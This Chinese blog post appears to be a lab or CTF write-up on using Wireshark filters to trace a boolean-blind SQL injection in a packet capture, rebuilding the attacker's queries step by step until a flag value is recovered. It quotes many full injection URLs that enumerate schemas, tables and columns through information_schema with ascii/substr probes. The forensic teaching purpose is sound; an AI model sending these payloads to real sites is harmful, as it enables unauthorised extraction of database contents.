<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/botanical.png">
  <link rel="icon" type="image/png" href="/img/botanical.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>wireshark分析sql注入流量 - zhazhafeng</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_fmb4a04yx8h.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">




<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>zhazhafeng's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">
              <i class="iconfont icon-home-fill"></i>
              首页</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">
              <i class="iconfont icon-archive-fill"></i>
              归档</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">
              <i class="iconfont icon-category-fill"></i>
              分类</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">
              <i class="iconfont icon-tags-fill"></i>
              标签</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">
              <i class="iconfont icon-user-fill"></i>
              关于</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/xue.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <div class="mt-3 post-meta">
                  <i class="iconfont icon-date-fill" aria-hidden="true"></i>
                  <time datetime="2020-05-18 17:39">
                    2020年5月18日 下午
                  </time>
                </div>
              

              <div class="mt-1">
                
                  
                  <span class="post-meta mr-2">
                    <i class="iconfont icon-chart"></i>
                    1.7k 字
                  </span>
                

                
                  
                  <span class="post-meta mr-2">
                      <i class="iconfont icon-clock-fill"></i>
                    
                    
                    26
                     分钟
                  </span>
                

                
              </div>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h3 id="实验要求"><a href="#实验要求" class="headerlink" title="实验要求"></a>实验要求</h3><p>利用wireshark分析sql注入攻击,要求通过分析协议包文件,实现攻击者IP溯源和攻击证据链提供。</p>
<h5 id="资源下载："><a href="#资源下载：" class="headerlink" title="资源下载："></a>资源下载：</h5><p><a href="https://pan.baidu.com/s/1FJZ5TDjA5zx8sBr-_wONOQ" target="_blank" rel="noopener">百度云</a><br>提取码：tccz</p>
<h3 id="操作步骤"><a href="#操作步骤" class="headerlink" title="操作步骤"></a>操作步骤</h3><ol>
<li><h4 id="观察报文规律"><a href="#观察报文规律" class="headerlink" title="观察报文规律"></a><strong>观察报文规律</strong></h4><p>猜测得到当sql注入成功时，返回的报文中会有</p>
<pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"span7 text-center"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span>This's Title!<span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">br</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">p</span> <span class="hljs-attr">class</span>=<span class="hljs-string">'lead'</span>&gt;</span>Content is very short!<span class="hljs-tag">&lt;/<span class="hljs-name">p</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span></code></pre>

<p>该字段是sql注入成功的反馈</p>
</li>
<li><h4 id="过滤数据包"><a href="#过滤数据包" class="headerlink" title="过滤数据包"></a>过滤数据包</h4><p>为使分析比较方便，只分析服务器返回的报文，其中有url攻击信息，也有结果显示。</p>
<p>过滤数据包</p>
<pre><code class="hljs applescript">frame <span class="hljs-keyword">contains</span> <span class="hljs-string">"This's Title"</span></code></pre>

<p>发现第一个报文的request url:</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20count(*)%20from%20information_schema.SCHEMATA))&gt;0</code></pre>

<p>该语句意思是在记录所有数据库信息的数据库中查找数据库的数量，length（5）=1，这里只是为了测试是否有数据库存在。</p>
<p>这里因为过滤了注入失败的报文，所以直接能判断，为严谨验证可以跟踪这个报文的上下报文，查看是否有&gt;1注入失败了。</p>
<p>然后可以看到下面报文：</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20count(*)%20from%20information_schema.SCHEMATA)),%201,%201))&gt;52</code></pre>

<p>可以看到<strong>count(*)</strong>的ascii码值为<strong>53</strong>，即<strong>5</strong>，数据库有5个</p>
<p>注：sql中substr下标从1开始的</p>
<p>过滤如下语句：</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> &amp;&amp; http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%200"</span></code></pre>
<p>得到：</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%200,1))&gt;17</code></pre>

<p>schema1长度为18</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> &amp;&amp; http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%201"</span></code></pre>
<p>得到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%201,1))&gt;2</code></pre>

<p>schema2长度为3</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> &amp;&amp; http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202"</span></code></pre>
<p>得到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1))&gt;6</code></pre>

<p>schema3长度为7</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> &amp;&amp; http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%203"</span></code></pre>
<p>得到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%203,1))&gt;4</code></pre>

<p>schema4长度为5</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> &amp;&amp; http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%204"</span></code></pre>

<p>得到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%204,1))&gt;3</code></pre>

<p>schema5长度为4</p>
<p>分析：</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1))&gt;6</code></pre>

<p>该语句的意思为在记录所有数据库信息的数据库中查找数据库的名字的长度<strong>&gt;6</strong>。此时为验证长度是否为<strong>7</strong>，过滤数据包：</p>
<pre><code class="hljs perl">http.response_for.uri contains <span class="hljs-string">"length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,%201"</span></code></pre>

<p>找到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1))&gt;7</code></pre>

<p>返回的结果没有<strong>title</strong></p>
<p>所以注入失败，说明该数据库名字长度为<strong>7</strong>。</p>
</li>
<li><h4 id="爆破数据库名"><a href="#爆破数据库名" class="headerlink" title="爆破数据库名"></a><strong>爆破数据库名</strong></h4><p>如</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1)),%201,%201))&gt;75</code></pre>

<p>一直到</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1)),%201,%201))&gt;99</code></pre>

<p>都返回title，说明<strong>第一个字符ascii码为100，为d</strong></p>
<p>同理接下来过滤：</p>
<pre><code class="hljs perl">frame contains <span class="hljs-string">"This's Title"</span> 
&amp;&amp; http.response_for.uri contains <span class="hljs-string">"http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20SCHEMA_name%20from%20information_schema.SCHEMATA%20limit%202,1)),%202,%201))"</span></code></pre>

<p><strong>得到第二个字符ascii码为98，为b</strong></p>
<p><strong>然后第三个字符ascii码为95，为_</strong></p>
<p><strong>第四个字符ascii码为102，为f</strong></p>
<p><strong>第五个字符sscii码为108，为l</strong></p>
<p><strong>第六个字符ascii码为97，为a</strong></p>
<p><strong>第七个字符ascii码为103，为g</strong></p>
<p><strong>则该数据库schema3名称为db_flag</strong></p>
<p>同理爆破其他数据库</p>
<p>schema1：</p>
<p>105,110,102,111,114,109,97,116······</p>
<p>informat···</p>
<p>结合上文可以猜出，该表为information_schema,长度正好为18</p>
<p>schema2：</p>
<p>99,116,102</p>
<p>ctf</p>
<p>schema4:</p>
<p>109,121,115,113,108</p>
<p>mysql</p>
<p>schema5:</p>
<p>116,101,115,116</p>
<p>test</p>
</li>
<li><h4 id="爆破db-flag数据库"><a href="#爆破db-flag数据库" class="headerlink" title="爆破db_flag数据库"></a><strong>爆破db_flag数据库</strong></h4><p>由于该文件后面流量只有爆破db_flag的信息，所以其他数据库可以不用管</p>
<p>很容易找到接下的报文信息：</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20count(*)%20from%20information_schema.tables%20where%20TABLE_SCHEMA='db_flag'))&gt;0</code></pre>

<p>分析方法同上，过滤：</p>
<pre><code class="hljs xquery">frame<span class="hljs-built_in"> contains</span> <span class="hljs-string">"This's Title"</span> 
&amp;&amp; http.response_for.uri<span class="hljs-built_in"> contains</span> http://<span class="hljs-number">172.16</span>.<span class="hljs-number">80.11</span>/index.php?act=news<span class="hljs-built_in">&amp;id</span>=<span class="hljs-number">1</span><span class="hljs-meta">%20and</span><span class="hljs-meta">%20length</span>((select<span class="hljs-meta">%20count</span>(*)<span class="hljs-meta">%20from</span><span class="hljs-meta">%20information_schema</span>.tables<span class="hljs-meta">%20where</span><span class="hljs-meta">%20TABLE_SCHEMA</span>=<span class="hljs-string">'db_flag'</span>))</code></pre>

<p>得到：</p>
<pre><code class="hljs html">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20count(*)%20from%20information_schema.tables%20where%20TABLE_SCHEMA='db_flag'))&gt;0</code></pre>

<p>注入成功，</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20count(*)%20from%20information_schema.tables%20where%20TABLE_SCHEMA='db_flag')),%201,%201))&gt;48</code></pre>

<p>为49，ascii码为1，说明table只有一个字段    </p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20TABLE_SCHEMA='db_flag'%20limit%200,%201))&gt;6</code></pre>

<p>得到表名一共7个字符</p>
<p>同理得：</p>
<p>第一个字符：Ascii码116，为t</p>
<p>第二个字符：Ascii码98，为b</p>
<p>第三个字符：Ascii码95，为_</p>
<p>第四个字符：Ascii码102，为f</p>
<p>第五个字符：Ascii码108，为l</p>
<p>第六个字符：Ascii码97，为a</p>
<p>第七个字符：Ascii码103，为g</p>
<p>表名为tb_flag</p>
</li>
<li><h4 id="爆破字段"><a href="#爆破字段" class="headerlink" title="爆破字段"></a><strong>爆破字段</strong></h4><pre><code class="hljs perl">http:<span class="hljs-regexp">//</span><span class="hljs-number">172.16</span>.<span class="hljs-number">80.11</span>/index.php?act=news&amp;id=<span class="hljs-number">1</span>%20and%20length((<span class="hljs-keyword">select</span>%20count(*)%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=<span class="hljs-string">'db_flag'</span>%20and%20TABLE_NAME=<span class="hljs-string">'tb_flag'</span>))&gt;<span class="hljs-number">0</span></code></pre>

<pre><code class="hljs perl">http:<span class="hljs-regexp">//</span><span class="hljs-number">172.16</span>.<span class="hljs-number">80.11</span>/index.php?act=news&amp;id=<span class="hljs-number">1</span>%20and%20ascii(<span class="hljs-keyword">substr</span>(((<span class="hljs-keyword">select</span>%20count(*)%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=<span class="hljs-string">'db_flag'</span>%20and%20TABLE_NAME=<span class="hljs-string">'tb_flag'</span>)),%201,%201))&gt;<span class="hljs-number">49</span></code></pre>

<p>所以字段一共有两个。</p>
<p>继续分析有<strong>title</strong>的流量</p>
<pre><code class="hljs perl">http:<span class="hljs-regexp">//</span><span class="hljs-number">172.16</span>.<span class="hljs-number">80.11</span>/index.php?act=news&amp;id=<span class="hljs-number">1</span>%20and%20length((<span class="hljs-keyword">select</span>%20column_name%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=<span class="hljs-string">'db_flag'</span>%20and%20TABLE_NAME=<span class="hljs-string">'tb_flag'</span>%20limit%201,<span class="hljs-number">1</span>))&gt;<span class="hljs-number">3</span></code></pre>

<p>得到第二个字段长度为4</p>
<p>第一个字符：Ascii码102，为f</p>
<p>第二个字符：Ascii码108，为l</p>
<p>第三个字符：Ascii码97，为a</p>
<p>第四个字符：Ascii码103，为g</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20column_name%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA='db_flag'%20and%20TABLE_NAME='tb_flag'%20limit%200,1))&gt;1</code></pre>

<p>得到第一个字段长度为2</p>
<p>105，i</p>
<p>100，d</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20ascii(substr(((select%20count(*)%20from%20db_flag.tb_flag)),%201,%201))&gt;48</code></pre>

<p>表里只有一个value</p>
<pre><code class="hljs http">http://172.16.80.11/index.php?act=news&amp;id=1%20and%20length((select%20concat_ws(char(94),%20flag)%20%20from%20db_flag.tb_flag%20%20limit%200,1))&gt;37</code></pre>

<p>flag长度为38</p>
<p>102 f</p>
<p>108 l</p>
<p>97 a</p>
<p>103 g</p>
<p>123 {</p>
<p>52 4</p>
<p>55 7</p>
<p>101 e</p>
<p>100 d</p>
<p>98 b</p>
<p>56 8</p>
<p>51 3</p>
<p>48 0</p>
<p>48 0</p>
<p>101 e</p>
<p>100 d</p>
<p>53 5</p>
<p>102 f</p>
<p>57 9</p>
<p>98 b</p>
<p>50 2</p>
<p>56 8</p>
<p>102 f</p>
<p>99 c</p>
<p>53 5</p>
<p>52 4</p>
<p>98 b</p>
<p>48 0</p>
<p>100 d</p>
<p>48 0</p>
<p>57 9</p>
<p>101 e</p>
<p>99 c</p>
<p>100 d</p>
<p>101 e</p>
<p>102 f</p>
<p>55 7</p>
<p>125 }</p>
<p>Flag{47edb8300ed5f9b28fc54b0d09ecdef7}</p>
<p>这里比较麻烦，本人手动一个个去找flag，可以有出错，以后可能会使用python分析（pyshark数据包处理模块）。</p>
</li>
</ol>
<h3 id="实验分析"><a href="#实验分析" class="headerlink" title="实验分析"></a>实验分析</h3><p>考察sql注入的理解程度，并且训练抓包分析数据的能力。</p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/wireshark/">wireshark</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">随意开火</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/05/18/wireshark-file-upload/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">wireshark_file_upload</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/05/14/burpsuit/">
                        <span class="hidden-mobile">burpsuit爆破tomcat弱口令</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://github.com/nichoushad" target="_blank" rel="nofollow noopener"><span>github</span></a>
      <i class="iconfont icon-love"></i>
      <a href="http://www.hdu.edu.cn/" target="_blank" rel="nofollow noopener">
        <span>hdu</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>





  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>






<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "wireshark分析sql注入流量&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>


















<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
